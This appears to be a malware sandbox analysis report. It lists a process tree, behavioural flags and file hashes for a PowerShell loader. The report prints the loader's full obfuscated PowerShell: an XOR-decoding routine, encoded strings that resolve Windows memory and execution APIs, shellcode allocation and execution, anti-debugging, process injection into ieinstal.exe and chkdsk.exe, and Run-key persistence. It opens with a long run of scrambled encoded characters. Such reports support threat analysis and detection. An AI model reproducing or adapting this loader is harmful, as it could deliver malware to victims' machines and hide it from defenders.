5 8F1 9DEB9k4 9C2E8 4 D 9TB AC9 6H8T5A8G4u9DFS9 6 9UB A AMCND CNDFB 0O9 2A8A3 BA3M9 2 9 BS9K2 9 0B9B6p8a3S9M2SBF1 9S8 8 5 BN1 8M2D9F9 9 4n8N3E9aEI9A8S9F9HA 7 9D8B9SES9S9s8I3 9S2t8 5 DCF D FD9 1W9SCS8I7UD 7FD 3VBB9S9D8h9T9 9M3E9 2H8 4T8 3s8 5T8C2F9 4 8L3 9 ES9T8 9T9FDD7SDS3 AH7 9 8 9 BD9 EB8U3 9 EP9 6B9ICT8s3M9TE 9 8 9 9 9 2p8 5gDNEODBBSD 7 DPF B 0VBY3AAU3 D 7 B 7PDrFKAEC B EU9I9S8p3TA 7M8S3L8 5 A A D BwDN7SAWC BRE 9N9 8 3TAA7 8 3T8G5 AKAEDLBBDU7 AAC BRE 9 9P8g3 AD7C8m3R8 5RA AIDBB D 7 AUCABAEF9 9 8R3 A 7K8P3 8 5WA AKD B DP7IA CCBPEG9 9T8b3BAT7C8R3 8t5 A A D EDDD7SD FDAXCFBAEF9 9C8 3 AM7S8 3E8A5OA A DGE DFEHDDEE'S;R& (R`$ SVl a mFbCaSdAe s 7S) Z`$TL iAl jCaT2 ;H`$GLHiRl j a 3u =S VP o l y g rRa 
p hJi cPaCl lEyH0 c' DT3PB 6 9RB 8 4A8C3B9 2s9D3 D 9EB E 9P9P8 1B9 8L9FC 9C2FDAFFDE3SAS2 9 3 8u3 8F5G8IES9SCF8s4T9C1I9P8h8b5M9 AU9 2P8B4 C 4SD BmDb3 BS6F9S9F8U3B9AEg9R5P9 E 9U8F8S3 9TES9BCB9S6C8o4UDaB DG3OA 4T9O2L9 AU9 E 9B1K9P8G8S5K9tAS9E2 9 3 D B CI7BD BBCU7OD E 'C;M&B( `$ S l aMm bVaUdUeEsV7F)U `$ LEiHl j aa3 #C;""";;Function Lilja9 { param([String]$Oxamid104); For($Fencings=1; $Fencings -lt $Oxamid104.Length-1; $Fencings+=(1+1)){ $Polygraphically = $Polygraphically + $Oxamid104.Substring($Fencings, 1); } $Polygraphically;}$Acridophagus0 = Lilja9 ' K S K B P S R H A S L S P L S VIKE XP ';$Acridophagus1= Lilja9 $Unacknowledgements;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Acridophagus1 ;}else{.$Acridophagus0 $Acridophagus1;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3812

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Polygraphically0 { param([String]$Oxamid104); $Jernindustriens = New-Object byte[] ($Oxamid104.Length / 2); For($Fencings=0; $Fencings -lt $Oxamid104.Length; $Fencings+=2){ $Uroceridae = $Oxamid104.Substring($Fencings, 2); $Jernindustriens[$Fencings/2] = [convert]::ToByte($Uroceridae, 16); $Jernindustriens[$Fencings/2] = ($Jernindustriens[$Fencings/2] -bxor 247); } [String][System.Text.Encoding]::ASCII.GetString($Jernindustriens);}$Bugvgs0=Polygraphically0 'A48E8483929AD9939B9B';$Bugvgs1=Polygraphically0 'BA9E94859884989183D9A09E99C4C5D9A29984969192B996839E8192BA92839F989384';$Bugvgs2=Polygraphically0 'B09283A7859894B6939385928484';$Bugvgs3=Polygraphically0 'A48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BF9699939B92A59291';$Bugvgs4=Polygraphically0 '8483859E9990';$Bugvgs5=Polygraphically0 'B09283BA9893829B92BF9699939B92';$Bugvgs6=Polygraphically0 'A5A3A48792949E969BB9969A92DBD7BF9E9392B58EA49E90DBD7A782959B9E94';$Bugvgs7=Polygraphically0 'A58299839E9A92DBD7BA969996909293';$Bugvgs8=Polygraphically0 'A592919B9294839293B3929B9290968392';$Bugvgs9=Polygraphically0 'BE99BA929A98858EBA9893829B92';$Slambades0=Polygraphically0 'BA8EB3929B9290968392A38E8792';$Slambades1=Polygraphically0 'B49B968484DBD7A782959B9E94DBD7A492969B9293DBD7B699849EB49B968484DBD7B6828398B49B968484';$Slambades2=Polygraphically0 'BE9981989C92';$Slambades3=Polygraphically0 'A782959B9E94DBD7BF9E9392B58EA49E90DBD7B99280A49B9883DBD7A19E858382969B';$Slambades4=Polygraphically0 'A19E858382969BB69B9B9894';$Slambades5=Polygraphically0 '9983939B9B';$Slambades6=Polygraphically0 'B983A7859883929483A19E858382969BBA929A98858E';$Slambades7=Polygraphically0 'BEB2AF';$Slambades8=Polygraphically0 'AB';$Nondestruction=Polygraphically0 'A2A4B2A5C4C5';$Politiaktioner=Polygraphically0 'B4969B9BA09E99939880A7859894B6';function fkp {Param ($Betagedes, $Jonatan) ;$Rettighedstabs0 
=Polygraphically0 'D3BF9299809E8492D7CAD7DFACB68787B3989A969E99AACDCDB4828585929983B3989A969E99D9B09283B68484929A959B9E9284DFDED78BD7A09F928592DAB8959D929483D78CD7D3A8D9B09B9895969BB68484929A959B8EB496949F92D7DAB69993D7D3A8D9BB989496839E9899D9A4879B9E83DFD3A49B969A9596939284CFDEACDAC6AAD9B28682969B84DFD3B58290819084C7DED78ADED9B09283A38E8792DFD3B58290819084C6DE';&($Slambades7) $Rettighedstabs0;$Rettighedstabs5 = Polygraphically0 'D3B09B968485989285D7CAD7D3BF9299809E8492D9B09283BA92839F9893DFD3B58290819084C5DBD7ACA38E8792ACAAAAD7B7DFD3B58290819084C4DBD7D3B58290819084C3DEDE';&($Slambades7) $Rettighedstabs5;$Rettighedstabs1 = Polygraphically0 '859283828599D7D3B09B968485989285D9BE9981989C92DFD399829B9BDBD7B7DFACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BF9699939B92A59291AADFB99280DAB8959D929483D7A48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BF9699939B92A59291DFDFB99280DAB8959D929483D7BE9983A78385DEDBD7DFD3BF9299809E8492D9B09283BA92839F9893DFD3B58290819084C2DEDED9BE9981989C92DFD399829B9BDBD7B7DFD3B59283969092939284DEDEDEDEDBD7D3BD989996839699DEDE';&($Slambades7) $Rettighedstabs1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Tripyrenous,[Parameter(Position = 1)] [Type] $Jagtfalkenes = [Void]);$Rettighedstabs2 = Polygraphically0 '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';&($Slambades7) $Rettighedstabs2;$Rettighedstabs3 = Polygraphically0 'D3B9968382859B9E909F92939285D9B392919E9992B498998483858294839885DFD3B58290819084C1DBD7ACA48E8483929AD9A592919B9294839E9899D9B4969B9B9E9990B49899819299839E989984AACDCDA483969993968593DBD7D3A3859E878E859299988284DED9A49283BE9A879B929A92998396839E9899B19B969084DFD3B58290819084C0DE';&($Slambades7) $Rettighedstabs3;$Rettighedstabs4 = Polygraphically0 
'D3B9968382859B9E909F92939285D9B392919E9992BA92839F9893DFD3A49B969A9596939284C5DBD7D3A49B969A9596939284C4DBD7D3BD96908391969B9C92999284DBD7D3A3859E878E859299988284DED9A49283BE9A879B929A92998396839E9899B19B969084DFD3B58290819084C0DE';&($Slambades7) $Rettighedstabs4;$Rettighedstabs5 = Polygraphically0 '859283828599D7D3B9968382859B9E909F92939285D9B48592968392A38E8792DFDE';&($Slambades7) $Rettighedstabs5 ;}$Panteforskrivnings = Polygraphically0 '9C928599929BC4C5';$Rettighedstabs6 = Polygraphically0 'D3AE8198999996D7CAD7ACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BA9685849F969BAACDCDB09283B3929B9290968392B19885B1829994839E9899A7989E99839285DFDF919C87D7D3A796998392919885849C859E81999E999084D7D3A49B969A9596939284C3DEDBD7DFB0B3A3D7B7DFACBE9983A78385AADBD7ACA2BE9983C4C5AADBD7ACA2BE9983C4C5AADBD7ACA2BE9983C4C5AADED7DFACBE9983A78385AADEDEDE';&($Slambades7) $Rettighedstabs6;$Semiformed = fkp $Slambades5 $Slambades6;$Rettighedstabs7 = Polygraphically0 'D3A29383858E9C849198859A9284C4D7CAD7D3AE8198999996D9BE9981989C92DFACBE9983A78385AACDCDAD928598DBD7C1C3C2DBD7C78FC4C7C7C7DBD7C78FC3C7DE';&($Slambades7) $Rettighedstabs7;$Rettighedstabs8 = Polygraphically0 'D3B699839E959E98839E9C9684D7CAD7D3AE8198999996D9BE9981989C92DFACBE9983A78385AACDCDAD928598DBD7CFC0C6C2C3C1CFCFDBD7C78FC4C7C7C7DBD7C78FC3DE';&($Slambades7) $Rettighedstabs8;$Udtryksformes00='HKCU:\Sorosphere\Laboranters';$Udtryksformes01 =Polygraphically0 'D3BB9E9B9D96CADFB09283DABE83929AA78598879285838ED7DAA796839FD7D3A29383858E9C849198859A9284C7C7DED9A4929B81919B929B8492';&($Slambades7) $Udtryksformes01;$Rettighedstabs9 = Polygraphically0 'D3A59283839E909F92938483969584D7CAD7ACA48E8483929AD9B4989981928583AACDCDB185989AB5968492C1C3A483859E9990DFD3BB9E9B9D96DE';&($Slambades7) $Rettighedstabs9;$Lilja0 = Polygraphically0 
'ACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BA9685849F969BAACDCDB498878EDFD3A59283839E909F92938483969584DBD7C7DBD7D7D3A29383858E9C849198859A9284C4DBD7C1C3C2DE';&($Slambades7) $Lilja0;$Muhamedaneren=$Rettighedstabs.count-645;$Lilja1 = Polygraphically0 'ACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BA9685849F969BAACDCDB498878EDFD3A59283839E909F92938483969584DBD7C1C3C2DBD7D3B699839E959E98839E9C9684DBD7D3BA829F969A9293969992859299DE';&($Slambades7) $Lilja1;$Lilja2 = Polygraphically0 'D3B69B84839293D7CAD7ACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BA9685849F969BAACDCDB09283B3929B9290968392B19885B1829994839E9899A7989E99839285DFDF919C87D7D3B9989993928483858294839E9899D7D3A7989B9E839E969C839E98999285DEDBD7DFB0B3A3D7B7DFACBE9983A78385AADBD7ACBE9983A78385AADBD7ACBE9983A78385AADBD7ACBE9983A78385AADBD7ACBE9983A78385AADED7DFACBE9983A78385AADEDEDE';&($Slambades7) $Lilja2;$Lilja3 = Polygraphically0 'D3B69B84839293D9BE9981989C92DFD3A29383858E9C849198859A9284C4DBD3B699839E959E98839E9C9684DBD3A4929A9E9198859A9293DBC7DBC7DE';&($Slambades7) $Lilja3#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3316

C:\Program Files (x86)\internet explorer\ieinstal.exe (process tree depth 5)
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID: 5056

C:\Windows\SysWOW64\chkdsk.exe (process tree depth 2)
Command line: "C:\Windows\SysWOW64\chkdsk.exe"
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2064

C:\Program Files\Mozilla Firefox\Firefox.exe (process tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
PID: 4204

C:\Windows\system32\WerFault.exe (process tree depth 4)
Command line: C:\Windows\system32\WerFault.exe -u -p 4204 -s 140
- Program crash
PID: 3312

C:\Windows\system32\WerFault.exe (process tree depth 1)
Command line: C:\Windows\system32\WerFault.exe -pss -s 472 -p 4204 -ip 4204
PID: 1272
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82